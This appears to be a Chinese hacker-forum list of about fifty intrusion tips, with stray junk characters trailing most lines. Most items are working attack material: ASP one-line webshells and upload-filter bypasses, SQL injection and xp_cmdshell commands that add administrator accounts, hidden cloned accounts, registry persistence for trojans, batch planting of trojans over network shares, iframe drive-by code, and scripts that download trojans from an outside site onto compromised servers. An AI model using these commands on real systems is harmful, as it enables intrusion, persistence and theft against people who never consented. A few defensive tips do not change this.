Xp系统修改权限防止病毒或木马等破坏系统,cmd下,( ?+ R3 v/ ~6 E+ D- D2 m q* _
cacls C:\windows\system32 /G hqw20:R& R+ P/ v& W# ~+ { P: {
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
* s0 W* o$ ?3 r5 I! P/ E恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
7 s- P8 C5 k" s0 }1 M) O4 t U$ R" L, [, c$ a6 _: y
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。- V5 _6 v( k" l& O1 y
- e$ o9 \/ r3 i$ c8 d0 Q* ~( @) E5 N3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。 o: R l$ g2 g, m' T6 {
$ R2 k6 v6 ?8 U% }6 F/ x1 I0 [4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号/ R$ n y: g% z! M# {! F1 \7 p {
% Z' `' ]2 w K2 ]5 z2 |; X( m5、利用INF文件来修改注册表
1 M) F5 h$ p( I0 Q[Version]
$ E J" E+ {$ A6 W% zSignature="$CHICAGO$"
) S' N3 {/ N5 ~( r$ @[Defaultinstall]' B$ |* E' A: {6 t3 }0 U
addREG=Ating: D: s9 j$ p9 r+ b; L+ Z7 O4 I
[Ating] M6 O' X) @+ }* k M
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"7 X) R4 h8 f' b& V/ R; I$ B1 h
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:8 |, E$ f4 G5 y" y* Z9 W& G
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
# @5 O8 f$ H" B9 ~9 B其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU* O2 [, t7 O1 ~
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
$ K6 X4 I$ y! A5 o. bHKEY_CURRENT_CONFIG 简写为 HKCC
5 j% z: ?* f. m! v$ g0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值0 y( v" p5 \2 x* x' i" j
"1"这里代表是写入或删除注册表键值中的具体数据
) Y9 B( O; f/ t
+ b* q4 w" {/ Q9 r m+ k2 j. J6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
' ^3 s& n. z+ f多了一步就是在防火墙里添加个端口,然后导出其键值" e5 a: c* V* A( e8 ^0 g: F
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
, W- I' `. V/ M- `7 {
6 R' s0 e0 V+ t! v9 d7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽; H6 x) ~6 Z2 m
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。 S8 q' f, h6 s$ m
, X& Z) V3 {1 Y2 @, a/ w$ @
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。' T' |8 x" j6 O
4 j$ t; }* E E+ M7 m# o
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
" W. |# b1 i. \. A) r可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
; u) f9 V# R6 [8 _' x* h! W
; M1 b( P1 k' @ c10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
9 W' K2 W1 r8 Q+ e9 j+ N4 P7 U
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
8 Q' l: N' q! q1 R用法:xsniff –pass –hide –log pass.txt; I$ `9 q/ G, z `2 ]
0 q8 i4 V4 I3 n: g- F! f4 P+ }% y" b12、google搜索的艺术! J. Y% ?& ~9 x3 B
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”/ d) h1 i C: Z9 ?9 F& f* c" ~' j
或“字符串的语法错误”可以找到很多sql注入漏洞。) O r' N5 j" }% G7 _
5 g, _5 i- N3 P3 d/ \5 k7 |. |; x
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
, I# ~! ]" u5 g$ j: u: N
+ p6 e: ^6 h& v+ S [2 K14、cmd中输入 nc –vv –l –p 1987% ^2 L+ L! T1 [0 e* V7 W
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
- A* w3 Y6 m1 T. H0 n: M3 M: l; s/ b1 g
15、制作T++木马,先写个ating.hta文件,内容为
2 `3 P1 z& D1 I" a7 y' ?2 r<script language="VBScript">
2 |4 V8 a3 D! u! t/ Aset wshshell=createobject ("wscript.shell" ). U4 r+ ^# H9 Y: C0 L- o& ]+ ^
a=wshshell.run("你马的名称",1)
0 L2 J) |2 P# M3 f& Kwindow.close
+ T5 Q" O6 J2 Q* a/ W8 s: s7 o</script>
) L' @+ O+ c% i5 [: L2 M A( x5 Q再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
; q7 J2 ?% R; K, V! C& \; [1 j- X T0 D7 N
16、搜索栏里输入+ u& x7 d! I* N8 H, }
关键字%'and 1=1 and '%'='( |; h# z. E4 @5 X" ?9 I
关键字%'and 1=2 and '%'='8 s; V9 z9 N8 _# J; e/ ~* ]
比较不同处 可以作为注入的特征字符- I! w& ~: c& k" o6 D/ w
/ n1 z3 F& c: }' Z17、挂马代码<html>
6 Z6 e' b3 ~8 [* w7 W<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
# M) P) i8 c) l" {) K- @& L" W</html>1 R4 F+ x. W6 p$ I# M7 {1 a3 `
. I$ ]; I) i: H" a) B& Y* h8 }18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
; d( ]- U; l. v+ Onet localgroup administrators还是可以看出Guest是管理员来。
9 V% i Y" G: M6 u2 A. D# W; e9 f$ @6 \. f. Y; G# S$ n
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
2 v6 W [/ f' ~0 A. g3 J用法: 安装: instsrv.exe 服务名称 路径
' \( ?# ]- a0 u7 U3 f/ o卸载: instsrv.exe 服务名称 REMOVE
/ ~( J: r) w5 y) t( N/ q! {* _ Q/ F
' @- ], k3 c" v2 P$ q6 A7 I6 V+ ~! M" Z; b
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
/ l2 V# U1 h6 K不能注入时要第一时间想到%5c暴库。
9 B6 H3 \, l `( B2 K, y7 ~. I2 x5 ~8 W4 b' M1 ]: T+ ^; o
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~: n8 o, L% s. Y" F' Q- u: I
8 h* n7 ]5 Z" `: `
23、缺少xp_cmdshell时* L6 n6 c- X3 X! A
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
' m" H9 j; c0 @# ^2 M- z假如恢复不成功,可以尝试直接加用户(针对开3389的)( @( z: \$ c- v- R8 \' F
declare @o int
) n/ i) h6 q) Q( x% N6 vexec sp_oacreate 'wscript.shell',@o out& }3 I% x/ R' L, ^
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员/ g! M# c7 \6 `3 N+ i* c( ?9 S- r
* O s- {2 V) q( _24.批量种植木马.bat
6 f5 W; s. P3 v6 `% ffor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中7 ~& {/ w4 A1 h
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间& a, \8 k; b4 N( ?* C: G5 n( |
扫描地址.txt里每个主机名一行 用\\开头
7 \6 a6 g( B. n H" H5 I9 b% `, y; y
) H" T7 |* k; o# S. z25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
- s+ T* {' Z6 ]' t# l# l4 e3 T6 L1 E
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
. T) q% L! J* i: Q5 m0 N将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
0 w( {& Y( u7 W# v, `.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
6 b/ H" S) `# o0 J6 q( P
r; v( ?$ v. i9 f; ]3 a* p$ l27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
8 X3 p& V; F# v+ r" R6 ~' R0 L d' U然后用#clear logg和#clear line vty *删除日志$ S4 l1 Y9 x G- V
" z6 [6 [7 X3 }' ^; M28、电脑坏了省去重新安装系统的方法
% G A# m# T+ x纯dos下执行,
# M/ T3 m) C, U1 Q: v8 _- `xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
r8 p" l6 t# ?% E- S2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config7 O% c$ O: K& z q: ?5 i8 F8 R( H
. _0 L; G9 s9 G! O+ [3 b# a; {29、解决TCP/IP筛选 在注册表里有三处,分别是:# U2 | y! y& W: a3 g
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip+ S+ U8 w7 i7 h6 Z2 Q F: ?0 v
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip- S/ d; ?6 {. N3 D* U7 \$ m8 N0 g
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- ~1 O! `4 o* m& v
分别用
3 R1 e9 }6 X' X! P; d& [2 C( a6 Lregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 F" h, t& q3 w" q( d" R. Bregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
2 Y9 L# v* Q5 [9 T: pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( Q- F. d5 k, A, L2 e( q6 d命令来导出注册表项8 Y1 a) o- o8 k& Z, R
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
; ?4 m0 X, z* I. [改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用7 n5 [3 d+ X' L" V) g7 Q
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
* K3 j4 \& J. d% k0 Q
. U1 |/ i( l( a3 S- ^30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U/ t8 V" A4 e/ n P/ S
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
+ P6 i$ w" B! c
" B4 Y, d% g$ W- c; E: ~31、全手工打造开3389工具
. P' [& h- M+ v2 L% o; Q打开记事本,编辑内容如下:, j2 O: ?- e W6 R& f' }2 i
echo [Components] > c:\sql4 a3 w3 `8 T) l1 e5 M4 P# N
echo TSEnable = on >> c:\sql& r; C/ m. f8 i' L
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
" S |' b5 e( h( @! v5 C& D0 O编辑好后存为BAT文件,上传至肉鸡,执行4 A i7 D% K* M# N r9 G
! G0 k. ^5 I3 a4 i& X ?' e32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
- t; b( w4 }9 |" `- n2 r, U/ {" t' ~
33、让服务器重启
) I. E) ]8 m: j写个bat死循环:6 B( F l* c7 k- \- |5 U
@echo off& P3 L1 L' Q/ i% f4 w, x
:loop1
J( c0 i/ y' W0 M2 xcls; |; }2 e# B6 i4 J1 @; G
start cmd.exe8 _. C5 J1 y! f) s; c
goto loop1
8 [' a/ ~% ]$ S; }" b8 u保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
8 q1 q6 u( Z+ w1 P( Q4 H, s5 Z
+ h9 @6 ]/ A* X1 x! k+ O34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,/ s& j5 Z% V& [6 w6 ?' P) m
@echo off
& n. A6 d+ N) W* ?9 N' C: Gdate /t >c:/3389.txt0 t" D/ ^! p* O; F" t$ B: I, R
time /t >>c:/3389.txt9 ?8 { _* K" p0 c/ [' i; X
attrib +s +h c:/3389.bat
5 B. k+ Y0 w- d# Yattrib +s +h c:/3389.txt' P" W6 K/ | X; M* @/ `& k2 J
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
8 k( ~+ w3 T1 O( u5 M并保存为3389.bat: @$ Y4 i5 ^$ }% x
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
6 t; H2 c ~) U$ v0 c5 \: p# w7 l4 I9 c* x9 p) p
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
+ B4 c3 E1 p) A. d( m0 ~8 @0 `2 ^start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
( [$ C, L3 _! m2 F; U8 X9 G输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。 D5 j: @# l, i: h0 g3 Q
8 D1 w4 m* w+ d, F$ t8 ~36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
6 q% |( a% Z6 aecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
5 a2 \( F1 a {. n) d; t# y8 Hecho 你的FTP账号 >>c:\1.bat //输入账号! G( z& F% [9 y1 V
echo 你的FTP密码 >>c:\1.bat //输入密码* B/ @; B' E1 `9 Y6 t
echo bin >>c:\1.bat //登入
. F* ]; G" x' h! \: ^) T6 Q: @echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么, G k) Z/ Y* T" M7 s, i& Z% t
echo bye >>c:\1.bat //退出& I" ]5 \# o% j7 ]8 J
然后执行ftp -s:c:\1.bat即可3 j6 R. [) U+ @' r" { i+ c
3 I( _! d3 {% s6 `: }- k
37、修改注册表开3389两法
7 m( n* H3 M& V8 k+ d* {7 h) X(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
4 }% I/ E9 d! qecho Windows Registry Editor Version 5.00 >>3389.reg
' g. P, g ~" J, A0 ?6 L4 G, j- techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg1 R1 w. u t8 v3 E A5 `) w' q. L7 y
echo "Enabled"="0" >>3389.reg
4 Z& v. e+ R( u( F* `+ ?echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows. r3 g% w9 }" c( p6 u/ d
NT\CurrentVersion\Winlogon] >>3389.reg
/ S! L r+ `: e5 ^2 o! oecho "ShutdownWithoutLogon"="0" >>3389.reg
8 W& u0 D7 H) T. ~, O$ R2 recho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]% W* l" w2 L o) J% \
>>3389.reg
: R! g" R) M5 O$ ?% _, iecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
L$ @! d q% H* }% m' K# q2 b+ Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]' e. |* s3 _6 `' }% g7 C
>>3389.reg
2 ?4 Y% l* v$ J6 U) U" q5 @6 I& ]echo "TSEnabled"=dword:00000001 >>3389.reg0 ~ B R" S) N. N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
; l& H1 Y; o- p9 _echo "Start"=dword:00000002 >>3389.reg7 j$ @- y! R7 I: C" x( ]+ Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
; o M/ ]3 E& t4 S; `" M7 M>>3389.reg% |# S3 e* k& Y0 ~9 e: T2 `! h: g
echo "Start"=dword:00000002 >>3389.reg! Y( v" U4 p5 y+ E6 n, {
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg' _* _9 q7 R# ~3 [. f
echo "Hotkey"="1" >>3389.reg' P' X6 P5 t, p Z' x9 F% @# s4 w4 g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ W% I0 U: j8 I4 I" l- w9 E
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
: c* M) G) o& Wecho "PortNumber"=dword:00000D3D >>3389.reg) w: A9 ~; q& L" R! u
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 } M, ]1 N" T. s) [3 ?1 `3 k
Server\WinStations\RDP-Tcp] >>3389.reg" S `5 z6 M4 g/ F0 h' W
echo "PortNumber"=dword:00000D3D >>3389.reg
: p9 v% `) C& ]; o/ k) y把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。( H4 U8 @" }9 q9 U) H
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)( b. Y% E+ n" a7 `4 D0 b
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
# o3 b$ _% P$ y(2)winxp和win2003终端开启7 X/ |1 w3 [: A' A$ L
用以下ECHO代码写一个REG文件:$ a* D/ _+ s! P% ?! S3 R p9 y R: b
echo Windows Registry Editor Version 5.00>>3389.reg+ S/ C- b- S3 _7 P" D8 _8 c; [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, m, H3 }9 S1 wServer]>>3389.reg
/ C7 A$ R1 P, ]* A* h; _echo "fDenyTSConnections"=dword:00000000>>3389.reg* t$ q+ r3 C2 O0 \' x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal a2 P2 ~9 a# I5 {2 S" r1 m6 p
Server\Wds\rdpwd\Tds\tcp]>>3389.reg4 Q8 Z* O5 i3 f' v6 U
echo "PortNumber"=dword:00000d3d>>3389.reg1 n+ {) K& F( K! c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 S0 \. b( v$ o+ D
Server\WinStations\RDP-Tcp]>>3389.reg9 T: D7 [& J+ x
echo "PortNumber"=dword:00000d3d>>3389.reg
- y- z3 V7 z* |+ c! C5 m% e8 ?然后regedit /s 3389.reg del 3389.reg
4 {) d, z" U4 |" A1 p% n; EXP下不论开终端还是改终端端口都不需重启$ Y8 M% z3 \( A Y/ C0 d
2 H2 c+ s6 W8 ]; M: B# k38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃, L0 g P- V. }* E, G8 g1 u
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
, A- N! B9 y& \: L; y
2 z, K L+ ]# [% `39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
) f3 A: m7 _$ x% I' A3 D7 |5 g(1)数据库文件名应复杂并要有特殊字符
0 L5 p! X r- k7 T(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
: K3 n4 ?* L/ x2 H* {1 l将conn.asp文档中的
' a# Z. N2 K$ M% `DBPath = Server.MapPath("数据库.mdb")
3 P1 D1 \6 L; i0 O7 Dconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
( Q. C9 P& E4 v% E4 T6 Q# W9 A) s
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
- ^1 L4 p$ m$ j6 c& ?0 f) c5 X(3)不放在WEB目录里' Q' @2 T9 \3 r8 [
- y1 X" O+ H0 {/ `
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
& t: s8 l+ N8 ?6 T( N( g3 R可以写两个bat文件
5 z% p; C2 C6 V! a$ E0 B@echo off
) V6 c0 P* P! I! _* T, h3 S@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe1 V/ Q s, Q& j
@del c:\winnt\system32\query.exe: x3 W" n% _7 A7 _
@del %SYSTEMROOT%\system32\dllcache\query.exe R. P, u; P0 g6 d# S! A# ^1 E' z% S
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的8 O/ E2 m) g% m/ D! d7 H% t& H
- z0 z0 V/ F4 K# P. y6 ^, m
@echo off
4 U( Y! a, y6 B9 E+ W- V( g) A@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe. N* V: k( |' K# w. L# e5 s/ X1 A
@del c:\winnt\system32\tsadmin.exe
1 A- B8 X1 S3 m" V@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
% `( s& U% R4 m1 q- p2 c# t# G% [/ M/ ]/ q: E0 k2 L
41、映射对方盘符; _; k; d- K$ }5 J$ J, U1 ]$ K
telnet到他的机器上,: P' k+ r" d8 n7 F z2 l$ r3 }
net share 查看有没有默认共享 如果没有,那么就接着运行& e7 v/ U( U. C2 B
net share c$=c:
" ]7 M8 C6 B+ A1 I6 Z6 Rnet share现在有c$
1 ^6 n/ I8 p' @: G1 G/ s在自己的机器上运行( J3 p/ r9 } V- m" f. N W
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
5 G. K7 b6 L/ V; G9 B: x# O* p7 o% a9 P8 u
42、一些很有用的老知识
2 b8 J% K0 J" C" `, g- H8 rtype c:\boot.ini ( 查看系统版本 )0 k# z' v# v. s5 {% a( |& ^
net start (查看已经启动的服务)
N1 \ w7 J- e0 `query user ( 查看当前终端连接 )
- X; \/ ?9 X! @0 V* C1 Unet user ( 查看当前用户 )6 E2 F _( W. Z* S. H+ O
net user 用户 密码/add ( 建立账号 )5 J1 R& y$ W+ k
net localgroup administrators 用户 /add (提升某用户为管理员)
* E/ M( t5 Y4 ~+ I, _ipconfig -all ( 查看IP什么的 )
: v- ]: ?$ ^% ?) Y$ W) W- u+ u) pnetstat -an ( 查看当前网络状态 )
4 d& [; `, {. @" Ffindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)+ ^0 ?8 }( {4 p# _
克隆时Administrator对应1F46 j9 C+ O$ Y$ p- d
guest对应1F5 V8 ?4 p) n0 p: ]2 M' z0 }# ~
tsinternetuser对应3E82 H; z- |" @6 z! g/ y& S0 {4 S
3 T# i0 B* n, K8 y43、如果对方没开3389,但是装了Remote Administrator Service
- f2 a, Y L. ]用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接+ C" S9 H$ m/ y4 w7 x
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
# Y- C) X, {0 J* `8 A' d) n先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"0 E: ~8 V; G$ L+ J. R1 R
) ^' n+ C8 c; q' Z6 z9 M- n; @; d44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定). z* h* r% c7 q0 ~! g6 p; q3 ]
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
% L: x0 J* w4 Y% n6 y/ c9 z- U% C. Z& ~4 a' p
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
: U# W8 A) E- ?+ @$ f5 E& Oecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
: R0 ]5 `9 U3 ^^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =$ f9 B7 X) p, x& \4 R8 y
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =0 a7 W& S" J. _* I3 @- c
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
! p" c/ x9 Y4 h" B9 [(这是完整的一句话,其中没有换行符)
+ n$ h, v# E3 b' e& g然后下载:( [( C+ S8 R$ T
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
% Y, n% D# X. F/ L6 f) {7 p& ]9 ~: p. a5 n2 X+ Y
46、一句话木马成功依赖于两个条件:6 P! V$ g* z2 t( m2 T
1、服务端没有禁止adodb.Stream或FSO组件) M3 b) }2 B( l3 |
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
5 ~. M+ s" x* h+ E/ M6 q/ m" {
- G; m5 l* w6 p G! H/ k# h47、利用DB_OWNER权限进行手工备份一句话木马的代码:. z! m3 |6 m3 J+ c% |* Y3 g) ^
;alter database utsz set RECOVERY FULL--
& f9 _+ f, v* a; Z, Q) H;create table cmd (a image)--
/ Q& l D4 V# }6 e( ?+ Q;backup log utsz to disk = 'D:\cmd' with init--8 H, g! y6 g# F, r% h$ k7 M' l3 p
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--& M9 z! S1 \+ Q
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--" H8 z k7 ]# J( O4 X m2 {- I
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
' E' c: \ ~3 M1 U( y
5 A* X8 k2 m9 u2 @" E48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
3 W$ ^8 p+ `+ T! a+ W/ u" d1 q+ W4 o+ a
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
9 z' R4 Q* r2 ^. N& b所有会话用 'all'。" P1 g) y3 f ` H1 }" }
-s sessionid 列出会话的信息。
# t% c _* h; h+ B-k sessionid 终止会话。: w! ~6 l% g r9 T
-m sessionid 发送消息到会话。
% f* j" f7 ~8 Z& p9 \, U
# ]" h$ V; H. e7 ?( g7 iconfig 配置 telnet 服务器参数。2 M- p. n- }1 F- l& K3 I
& @5 _5 g/ n E
common_options 为:, y1 ^" _( e \1 S5 r0 S3 y2 X3 r
-u user 指定要使用其凭据的用户! |% X" g* a* K: r- I$ z; w
-p password 用户密码
4 g. M% F i. j% R) S* a/ O8 G5 T( O1 n4 d' V: i
config_options 为:
% M6 W' e4 Q- J9 H" i7 o& {dom = domain 设定用户的默认域
) I" B9 Y& F( [ Qctrlakeymap = yes|no 设定 ALT 键的映射
7 M6 |# }" M! X2 \4 Y" ^2 B4 Ctimeout = hh:mm:ss 设定空闲会话超时值
$ y! y( [9 G0 ] |9 ~- C6 g$ Ntimeoutactive = yes|no 启用空闲会话。
& X+ F. L3 B- x" |. g. R; Smaxfail = attempts 设定断开前失败的登录企图数。
) [! M4 H9 N' ?4 C5 [: p# emaxconn = connections 设定最大连接数。
) f8 I$ a1 G( V! A, ]port = number 设定 telnet 端口。2 {$ p' w! g3 H! B4 S
sec = [+/-]NTLM [+/-]passwd
0 `! R( w& ~( k6 X设定身份验证机构. D8 B* q" n& T$ h4 J
fname = file 指定审计文件名。' } H4 E7 j5 ^( e3 @' d
fsize = size 指定审计文件的最大尺寸(MB)。
0 V; k- l8 z4 \. s3 Rmode = console|stream 指定操作模式。
) y5 g: j) E) V& G$ Iauditlocation = eventlog|file|both1 j) h4 j; x( k3 `9 D% _5 m
指定记录地点0 G! a5 k; r5 j
audit = [+/-]user [+/-]fail [+/-]admin6 p9 U, N8 g Y I8 V9 h
8 U- v% d$ J+ ^8 ?; j" H
49、例如:在IE上访问:4 x# X8 l) X0 j! L$ X+ z# H9 ~
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
8 a0 q! {( F) _5 xhack.txt里面的代码是:) T. g( a4 O& I& G4 Y( ?
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">; s" D/ _3 ^ E/ w$ H+ f) ]
把这个hack.txt发到你空间就可以了!: B/ v5 M# \) a" W# A% \2 n6 I
这个可以利用来做网马哦!" o0 L: m7 f/ n
) I" L9 H( F5 T1 G50、autorun的病毒可以通过手动限制!* q4 f% I5 U( c$ {; [* y
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!$ p* D% {4 _$ p3 ~3 A1 T8 F9 }
2,打开盘符用右键打开!切忌双击盘符~0 v! T, r% e2 d u8 |
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!; I4 {5 e4 @, A! s" q% i) |( X) _$ y B6 r
; T% D7 I$ E4 @4 P- O4 L51、log备份时的一句话木马:
/ {+ m2 @5 k$ }' wa).<%%25Execute(request("go"))%%25>
7 s$ V2 z8 ?3 k) z0 {b).<%Execute(request("go"))%>
: O8 N1 w6 @9 i& {" Dc).%><%execute request("go")%><%# A1 s' e0 }2 f% @
d).<script language=VBScript runat=server>execute request("sb")</Script>9 L+ x& t: C1 _* Z& m; j% {
e).<%25Execute(request("l"))%25>& y/ i8 q6 M' q% E+ n
f).<%if request("cmd")<>"" then execute request("pass")%>, F8 L$ Q9 H7 d! Z7 [: c2 f( K
